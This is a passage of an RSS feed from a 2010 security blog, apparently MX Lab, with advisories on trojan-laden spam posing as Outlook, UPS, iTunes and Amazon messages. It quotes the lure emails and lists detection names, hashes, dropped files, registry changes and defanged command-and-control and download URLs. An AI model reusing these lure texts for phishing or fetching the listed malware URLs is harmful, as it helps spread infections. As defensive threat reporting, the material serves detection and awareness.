<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/907/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/907/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/907/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/907/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/907/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/907/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/907/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/907/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/907/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/907/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=907&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/06/08/new-oficla-trojan-in-messages-with-subject-changelog-07-06-2010/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>
	</item>
		<item>
		<title>Email with subject &#8220;Outlook Setup Notification&#8221; contains trojan</title>
		<link>http://blog.mxlab.eu/2010/06/02/email-with-subject-outlook-setup-notification-contains-trojan/</link>
		<comments>http://blog.mxlab.eu/2010/06/02/email-with-subject-outlook-setup-notification-contains-trojan/#comments</comments>
		<pubDate>Wed, 02 Jun 2010 19:53:28 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Viruses]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Outlook]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=904</guid>
		<description><![CDATA[MX Lab intercepted a few emails with the subject &#8220;Outlook Setup Notification&#8221;. The message contains instructions to re-configure Microsoft Outlook and to open the attached zip file. The message comes from the spoofed email address: microsoft outlook support &#60;****@****.com&#62;. The body of the email: You have (8) messages from Microsoft Outlook. Please re-configure your Microsoft Outlook [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=904&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab intercepted a few emails with the subject &#8220;Outlook Setup Notification&#8221;. The message contains instructions to re-configure Microsoft Outlook and to open the attached zip file.</p>
<p>The message comes from the spoofed email address: microsoft outlook support &lt;****@****.com&gt;.</p>
<p>The body of the email:</p>
<blockquote><p>You have (8) messages from Microsoft Outlook.</p>
<p>Please re-configure your Microsoft Outlook again.</p>
<p>Download attached setup file and install.</p></blockquote>
<p>The trojan is known as Win32/TrojanDownloader.FakeAlert.AXP (NOD32), W32/Trojan3.BUV (F-Prot), Trojan.TDss.AEJ (BitDefender) or Mal/FakeAV-CS (Sophos).</p>
<p>Virus Total <a href="http://www.virustotal.com/analisis/28ec0595c47f53de9165e7df54f1c4bf8544a318d0945a16a2d43e21397e9f6e-1275498614" target="_blank">permlink</a> and MD5: 1c71e23c6932f7c2e0a32b241474fe7f.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/904/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/904/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/904/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/904/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/904/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/904/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/904/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/904/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/904/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/904/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=904&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/06/02/email-with-subject-outlook-setup-notification-contains-trojan/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>
	</item>
		<item>
		<title>Emails with the subject &#8220;UPS INVOICE NR9094991&#8243; and &#8220;Delivery Problem NR2204780&#8243; contains trojan</title>
		<link>http://blog.mxlab.eu/2010/05/26/emails-with-the-subject-ups-invoice-and-delivery-problem-contains-trojan/</link>
		<comments>http://blog.mxlab.eu/2010/05/26/emails-with-the-subject-ups-invoice-and-delivery-problem-contains-trojan/#comments</comments>
		<pubDate>Wed, 26 May 2010 22:26:33 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Viruses]]></category>
		<category><![CDATA[Bredolab]]></category>
		<category><![CDATA[FakeAlert]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[oficla]]></category>
		<category><![CDATA[Sasfis]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[UPS]]></category>
		<category><![CDATA[UPS trojan]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=859</guid>
		<description><![CDATA[A combination of the &#8220;Thank you for buying iTunes Gift Certificate!&#8221; and the latest UPS related emails with subjects like &#8220;UPS INVOICE NR9094991&#8243; or  &#8221;Delivery Problem NR2204780&#8243; has made that MX Lab noted the highest virus detection rate since months. The possible subjects are (numbers are random): UPS INVOICE NR9094991 Delivery Problem NR2204780 The body of the [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=859&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>A combination of the <a href="http://blog.mxlab.eu/2010/05/26/new-trojan-variant-in-“thank-you-for-buying-itunes-gift-certificate”-email/" target="_self">&#8220;Thank you for buying iTunes Gift Certificate!&#8221;</a> and the latest UPS related emails with subjects like &#8220;UPS INVOICE NR9094991&#8243; or  &#8221;Delivery Problem NR2204780&#8243; has made that MX Lab noted the highest virus detection rate since months.</p>
<p>The possible subjects are (numbers are random):</p>
<p>UPS INVOICE NR9094991<br />
Delivery Problem NR2204780</p>
<p>The body of the email:</p>
<blockquote><p>Hello!<br />
Unfortunately we were not able to deliver your postal you have sent on the 11th of March in time because the addressee&#8217;s is inexact.<br />
Please print out the invoice copy attached and collect the package at our department.<br />
UPS Global Services.</p></blockquote>
<blockquote><p>Hello!<br />
We failed to deliver the postal you have sent on the 24th of March in time because the addressee&#8217;s is wrong.<br />
Please print out the invoice copy attached and collect the package at our department.<br />
UPS Express Services.</p></blockquote>
<p>The email contains the zip archive upsinvoice3325037.zip, once extracted the 36 kB large file UPSINVOICE.exe is available.</p>
<p>The trojan is known as W32/FakeAlert.NW (F-Prot), Trojan.Win32.VBKrypt.yj (Kaspersky), Win32/Oficla.EU (NOD32), Troj/Bredo-CX (Sophos) or Trojan.Sasfis (Symantec).</p>
<p>The following files are created:</p>
<p>%Temp%\1.tmp<br />
%System%\nnfj.tqo<br />
%Temp%\2.tmp<br />
%Windir%\scindl.dll</p>
<p>The following modules will be loaded into the address space of other process(es):</p>
<p>%Windir%\scindl.dll &#8212;&gt;<br />
Process name: explorer.exe<br />
Process filename: %Windir%\explorer.exe<br />
Address space: 0x1E90000 &#8211; 0x1EA1000</p>
<p>%Windir%\scindl.dll &#8212;&gt;<br />
Process name: IEXPLORE.EXE<br />
Process filename: %ProgramFiles%\internet explorer\iexplore.exe<br />
Address space: 0&#215;1940000 &#8211; 0&#215;1951000</p>
<p>%Windir%\scindl.dll &#8212;&gt;<br />
Process name: [generic host process]<br />
Process filename: [generic host process filename]<br />
Address space: 0&#215;10000000 &#8211; 0&#215;10011000</p>
<p>The trojan can establish a remote connection with the following hosts on port 80:</p>
<p>85.87.17.230<br />
89.149.202.142<br />
95.211.27.238</p>
<p>Data will be requested fromt he following web sites:</p>
<p>* hxxp://funnylive2010.ru/ms/bb.php?v=200&amp;id=653227819&amp;b=newsp&amp;tm=2<br />
* hxxp://funnylive2010.ru/ms/bb.php?v=200&amp;id=653227819&amp;tid=5&amp;b=newsp&amp;r=1&amp;tm=2<br />
* hxxp://www.yunusemre.net/trpanel/fckeditor/editor/<br />
_source/classes/sistempod.exe</p>
<p>Virus Total <a href="http://www.virustotal.com/analisis/42763f2bae33449acc3bf441494ea2d35d608d32edc57c5ba366bd5046e6c0ff-1274902157" target="_blank">permlink</a> and MD5: 493c929efe366812cd6fc921c2b549fc.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/859/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/859/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/859/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/859/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/859/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/859/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/859/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/859/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/859/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/859/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=859&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/05/26/emails-with-the-subject-ups-invoice-and-delivery-problem-contains-trojan/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>
	</item>
		<item>
		<title>New trojan variant in “Thank you for buying iTunes Gift Certificate!” email</title>
		<link>http://blog.mxlab.eu/2010/05/26/new-trojan-variant-in-%e2%80%9cthank-you-for-buying-itunes-gift-certificate%e2%80%9d-email/</link>
		<comments>http://blog.mxlab.eu/2010/05/26/new-trojan-variant-in-%e2%80%9cthank-you-for-buying-itunes-gift-certificate%e2%80%9d-email/#comments</comments>
		<pubDate>Wed, 26 May 2010 14:49:12 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Viruses]]></category>
		<category><![CDATA[Gift certificate]]></category>
		<category><![CDATA[iTunes]]></category>
		<category><![CDATA[iTunes Gift Certificate]]></category>
		<category><![CDATA[iTunes trojan]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=854</guid>
		<description><![CDATA[MX Lab started to intercept a new campaign with the subject “Thank you for buying iTunes Gift Certificate!” with the trojan Gen:Variant.Bredo.4 (Bitdefender, F-Secure), Win32/Oficla.GQ (NDO32), Trojan.Sasfis (Symantec) or Mal/EncPk-NS (Sophos). It is clear that with this campaign, the virus authors are using a subtle way to lure potential victims. Getting a $50 iTunes Gift [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=854&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab started to intercept a new campaign with the subject “Thank you for buying iTunes Gift Certificate!” with the trojan Gen:Variant.Bredo.4 (Bitdefender, F-Secure), Win32/Oficla.GQ (NDO32), Trojan.Sasfis (Symantec) or Mal/EncPk-NS (Sophos).</p>
<p>It is clear that with this campaign, the virus authors are using a subtle way to lure potential victims. Getting a $50 iTunes Gift Certificate is more tempting than anything else.</p>
<p>This distribution is sent from the spoofed email address iTunes Products &lt;customer.service@itunes.com&gt;.</p>
<p>The body of the email:</p>
<blockquote><p>Hello!</p>
<p>You have received an iTunes Gift Certificate in the amount of $50.00<br />
You can find your certificate code in attachment below.</p>
<p>Then you need to open iTunes. Once you verify your account, $50.00 will be credited to your account, so you can start buying music, games, video right away.</p>
<p>iTunes Store.</p></blockquote>
<p>The email contains the file ZIP archive Gift_Certificate_531.zip containing the 36 kB large executable Gift_Certificate_531.exe.</p>
<p>The following files are created:</p>
<p>%Temp%\1.tmp<br />
%System%\nnfj.tqo<br />
%Temp%\4.tmp<br />
%Temp%\_check32.bat<br />
%Windir%\Moxmact1.dll<br />
%Windir%\s32.txt<br />
%System%\aspimgr.exe<br />
%Windir%\ws386.ini</p>
<p>A new process will be created on the system:</p>
<p>%System%\aspimgr.exe</p>
<p>The following modules will be loaded into the address space of other process(es):</p>
<p>%Windir%\Moxmact1.dll &#8212;&gt;<br />
Process name: explorer.exe<br />
Process filename: %Windir%\explorer.exe<br />
Address space: 0x1E80000 &#8211; 0x1E91000</p>
<p>%Windir%\Moxmact1.dll &#8212;&gt;<br />
Process name: [generic host process]<br />
Process filename: [generic host process filename]<br />
Address space: 0&#215;10000000 &#8211; 0&#215;10011000</p>
<p>New registry key creations:</p>
<ul>
<li>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\idid</li>
<li>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Phuxobab</li>
<li>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Sft</li>
<li>HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_ASPIMGR</li>
<li>HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_ASPIMGR000</li>
<li>HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_ASPIMGR000\Control</li>
<li>HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\aspimgr</li>
<li>HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\aspimgr\Security</li>
<li>HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\aspimgr\Enum</li>
<li>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_ASPIMGR</li>
<li>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_ASPIMGR000</li>
<li>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_ASPIMGR000\Control</li>
<li>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr</li>
<li>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Security</li>
<li>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum</li>
</ul>
<p>The following registry keys are modified:</p>
<ul>
<li>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows  NT\CurrentVersion\Winlogon]
<ul>
<li>Shell =</li>
</ul>
</li>
<li>[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ServiceCurrent]
<ul>
<li>(Default) =</li>
</ul>
</li>
<li>[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ServiceCurrent]
<ul>
<li>(Default) =</li>
</ul>
</li>
</ul>
<p>The trojan can establish a remote connection with the following hosts on port 80:</p>
<p>128.175.82.88<br />
195.78.108.203<br />
89.149.202.142<br />
95.211.27.238</p>
<p>Data will be requested fromt he following web sites:</p>
<p>* hxxp://funnylive2010.ru/ms/bb.php?v=200&amp;id=555611691&amp;b=26may&amp;tm=2<br />
* hxxp://funnylive2010.ru/ms/bb.php?v=200&amp;id=555611691&amp;tid=11&amp;b=26may&amp;r=1&amp;tm=2<br />
* hxxp://porsche911start.ru:80/board.php<br />
* hxxp://www.yunusemre.net/trpanel/fckeditor/editor/<br />
_source/classes/v106.exe<br />
* hxxp://www.yunusemre.net/trpanel/fckeditor/editor/<br />
_source/classes/sistempod.exe</p>
<p>At the time of writing, 16 of the 41 AV engines did detect the trojan. Virus Total <a href="http://www.virustotal.com/analisis/49c72ecc9dfe38cc4a3e7170ede64658bb1fd4b431d9674c53452fa6041b8564-1274882223" target="_blank">permlink</a> and MD5: 75809a70e8773d51c5b20dd0f7b8163e.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/854/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/854/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/854/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/854/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/854/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/854/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/854/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/854/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/854/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/854/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=854&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/05/26/new-trojan-variant-in-%e2%80%9cthank-you-for-buying-itunes-gift-certificate%e2%80%9d-email/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>
	</item>
		<item>
		<title>New malspam regarding your Amazon order: Your order has been paid! Parcel NR:58588-691</title>
		<link>http://blog.mxlab.eu/2010/05/17/new-malspam-regarding-your-amazon-order-your-order-has-been-paid-parcel-nr58588-691/</link>
		<comments>http://blog.mxlab.eu/2010/05/17/new-malspam-regarding-your-amazon-order-your-order-has-been-paid-parcel-nr58588-691/#comments</comments>
		<pubDate>Mon, 17 May 2010 08:22:45 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Viruses]]></category>
		<category><![CDATA[Amazon]]></category>
		<category><![CDATA[Bredolab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=849</guid>
		<description><![CDATA[MX Lab detected a new malware spam outbreak with the subject &#8220;Your order has been paid! Parcel NR:58588-691&#8243;regarding a payment towards Amazon. The malware is sent from a spoofed email address in the form of Amazon Manager Vaughn Montes &#60;refrigeratorser22@rokulabs.com&#62;. The trojan is known as Trojan.Generic.Bredolab.3232 (ClamAV), W32/VBcrypt.E.gen!Eldorado (Eldorado), W32/VBcrypt.E.gen!Eldorado (F-Prot) or Heuristic.BehavesLike.Win32.Downloader.H (McAfee-GW-Edition). The body of [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=849&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab detected a new malware spam outbreak with the subject &#8220;Your order has been paid! Parcel NR:58588-691&#8243;regarding a payment towards Amazon. The malware is sent from a spoofed email address in the form of Amazon Manager Vaughn Montes &lt;refrigeratorser22@rokulabs.com&gt;.</p>
<p>The trojan is known as Trojan.Generic.Bredolab.3232 (ClamAV), W32/VBcrypt.E.gen!Eldorado (Eldorado), W32/VBcrypt.E.gen!Eldorado (F-Prot) or Heuristic.BehavesLike.Win32.Downloader.H (McAfee-GW-Edition).</p>
<p>The body of the email:</p>
<blockquote><p>Dear Sirs,</p>
<p>Thank you for shopping at Amazon.com!</p>
<p>We have successfully received your payment.</p>
<p>Your order has been shipped to your billing address.</p>
<p>You have ordered ” Sony Bravia  S1452 ”</p>
<p>You can find your tracking number in attached to the e-mail  document.</p>
<p>Print the postal label to get your package.</p>
<p>We hope you enjoy your order!</p>
<p>Vaughn Montes, Amazon</p></blockquote>
<p>The email has the ZIP archive Amazon_label_N-322-552.zip attached and contains the 36 kB large file Amazon_label_N-322-552.DOC.exe.</p>
<p>The following files are created:</p>
<p>C:\Documents and Settings\User\Local Settings\Temp\1.tmp<br />
C:\WINDOWS\system32\thxr.wgo</p>
<p>An HTTP request will be done to:</p>
<p>hxxp://hulejsoops.ru/images/bb.php?v=200&amp;id=636608811&amp;b=build_9&amp;tm=1<br />
hxxp://hulejsoops.ru/images/bb.php?v=200&amp;id=636608811&amp;b=build_9&amp;tm=2<br />
hxxp://hulejsoops.ru/images/bb.php?v=200&amp;id=636608811&amp;b=build_9&amp;tm=3</p>
<p>At the time of writing, only 5 of the 41 AV engines at Virus Total did detect the threat. Virus Total <a href="http://www.virustotal.com/analisis/7cf41d0feea39c27f0671e7be8683c6ae7a807900108e77c85636baa7cfb3bf1-1274083361" target="_blank">permlink</a> and MD5: b31628758d2557315403f59cc65bc33d.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/849/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/849/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/849/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/849/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/849/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/849/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/849/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/849/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/849/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/849/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=849&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/05/17/new-malspam-regarding-your-amazon-order-your-order-has-been-paid-parcel-nr58588-691/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>
	</item>
	</channel>
</rss>